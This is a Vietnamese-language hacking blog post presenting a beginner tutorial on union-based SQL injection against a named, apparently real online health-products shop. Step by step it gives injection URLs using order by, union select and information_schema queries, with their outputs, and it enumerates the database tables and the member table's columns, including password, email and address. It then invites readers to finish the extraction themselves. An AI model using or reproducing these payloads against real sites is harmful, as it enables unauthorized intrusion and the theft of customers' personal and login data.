Khai Thác Shop Lỗi Dạng HTML

Tut cũ nhưng post lại cho newbie nhé
Khai thác sql dạng HTML

victim là:

http://www.worldwidehealthcenter.net/articles-261.html

Thêm dấu ‘ vào sau những con số

http://www.worldwidehealthcenter.net…es-261%27.html
Lỗi nhé
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information – headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Bắt đầu order by

http://www.worldwidehealthcenter.net/articles-261 order by 1– -.html >>ok

http://www.worldwidehealthcenter.net/articles-261 order by 7– -.html >> ok

http://www.worldwidehealthcenter.net/articles-261 order by 8– -.html >> bao loi

>>8-1=7 nhé

bây h union select :

http://www.worldwide…et/articles-261 union select 1,2,3,4,5,6,7– -.html

ax không thấy số nào : view source , chẳng thấy gì hết

Các bạn thay số bằng null xem 261=null

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7– -.html

ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7– -.html

Tiếp theo tìm table name

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()– -.html

Ra 1 đống :

adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé

member=0x6d656d626572 (conver to hex nhé)

Bây giờ get column

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572– -.html

lại ra 1 đống :

id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé

About securityforall

it, smile, share for people,...

Posted on May 30, 2012, in Hack SQL Injection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: